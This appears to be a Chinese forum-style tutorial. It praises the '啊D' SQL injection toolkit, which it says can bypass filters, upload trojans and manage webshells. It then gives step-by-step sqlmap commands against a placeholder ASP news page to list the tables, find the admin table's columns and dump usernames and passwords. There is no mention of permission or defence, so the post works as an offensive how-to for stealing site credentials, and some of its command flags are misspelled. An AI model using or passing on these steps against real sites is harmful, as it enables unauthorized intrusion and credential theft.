啊D注入工具谁用过？怎么样？

啊D注入工具对MSSQL、Access等数据库都有很好注入检测能力，以及可利用Cookies绕过防注入系统、管理入口检测、内集跨库查询、注入点扫描、木马上传、注册表读取、旁注/上传、目录查看、CMD命令、WebShell管理的综合注入工具包

方法/步骤

首先我们先来跑表

命令是sqlmap –u “url/NewsShow.asp?id=69” –tables

一路上大家遇到这个

可以直接选择回车

等到了这里

大家选择线程1到10

开始扫表。你也可以在出现admin这个表的时候按下ctrl+c就可以终止然后就获取表

然后我们直接再次输入命令sqlmap –u “url/NewsShow.asp?id=69” –colunmns –T admin

然后得到了里面的字段username password id

然后我们直接跑字段内容sqlmap –u “url/NewsShow.asp?id=69” –dumps –T admin –C “username,password”

然后一路还是回车。到了

还是选择线程1到10

最后跑出了用户名。密码

9

---